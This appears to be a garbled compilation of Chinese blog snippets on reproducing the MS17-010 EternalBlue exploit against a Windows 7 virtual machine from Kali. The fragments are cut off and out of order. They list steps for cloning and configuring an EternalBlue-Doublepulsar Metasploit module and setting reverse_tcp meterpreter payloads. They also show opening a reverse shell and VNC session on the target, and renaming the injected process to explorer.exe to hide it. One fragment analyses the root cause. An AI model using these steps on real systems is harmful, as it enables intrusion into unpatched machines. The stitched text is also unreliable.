1,原版windows7:cn_windows_7_enterprise_x86_dvd_x15-70737.iso 2,kali系统, 虚拟机 3,用于32位机的攻击模块:Eternalblue-Doublepulsar 1>克隆到root目录下: 1 git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git 2>拷贝包内的:eternalblue_doublepulsar至 /usr/share/metasploit-f...
use exploit/windows/smb/ms17_010_eternalblue(用于64位机) 这里由于该系统是32位的,所以用编号为1的攻击模块 然后同2.3中设置要攻击的ip,run进行攻击。 执行远程桌面: runvnc 执行成功 ps查看靶机进程: shell 进行反弹shell: 复现完毕。
7.确定靶机是X32位操作系统,安装wine 32环境,安装攻击32位操作系统所用的的脚本 安装wine 32 位环境: 方法一: apt-get install wine32 在执行exploit时可能会出现 : it looks like wine32 is missing, you should install it. multiarch needs to be enabled first. as root, please execute "dpkg --add-...
【注意:Payload为windows/meterpreter/reverse_tcp 默认获取到的控制通道meterpreter为32位, 如果想将之后获取到的控制通道meterpreter改为64位,则设置payload:windows/x64/meterpreter/reverse_tcp】10.4)设置目标主机地址 发现仅RHOST为空待设置,其它(payload/RPORT/LHOST/LPORT)均已获取,且正确,就可以设置被攻击的目标...
该脚本也是64位和32位集成,可自行选择。 关于蓝屏: 上面两个脚本在本地均多次进行测试,用起来挺稳定的,没有出现蓝屏情况,可自行复现测试。 # 网络安全 海龙6666 这家伙太懒了,还未填写个人描述! 已在FreeBuf发表 4 篇文章 本文为 海龙6666 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freeb...
一、复现环境 主机信息 OS Name:kali2020 metasploit framework:msf6 IP:192.168.31.53 2. 靶机...
MS17-010漏洞分析与复现 如果满足if条件遍历完fea则跳出while循环执行第23行代码更新fealist的长度字段cblist但要注意无论是第1行参数所示还是前面所了解到的fealist结构cblist的数据类型应该是dword即32位长度而在第23行代码更新长度的时候却是以word数据类型即16位长度来更新的也就是说更新cblist时只更改了低16...
Shellcode的问题 针对不同架构的主机需要选择不同架构的shellcode 反之即蓝屏 psexec支持32位的靶机 建议使用psexec 我
永恒之蓝是去年玩剩下的了,记得当初刚刚泄露的时候,用的是 NSA 那个 fb.py 脚本去复现漏洞的。现在 Metasploit 里面已经集成了 17-010 漏洞,渗透测试更加方便与正式化,内网中用 17-010 去测一测会发现意外惊喜哦。 写在前面 起初在 Docker 环境下最后执行 exploit 的时候总是拿不到 sessions,换了很多系统失败...
(吐槽一下,感觉64位配置环境的时间都够下个32位安上了) 3.修改下载的eternalblue_doublepulsar.rb 1.改路径 将/root/Eternalblue-Doublepulsar-Metasploit/deps/改为/usr/share/metasploit-framework/modules/exploits/windows/smb/deps 2.改进程名称 默认进程名称为wlms.exe,建议修改为explorer.exe ...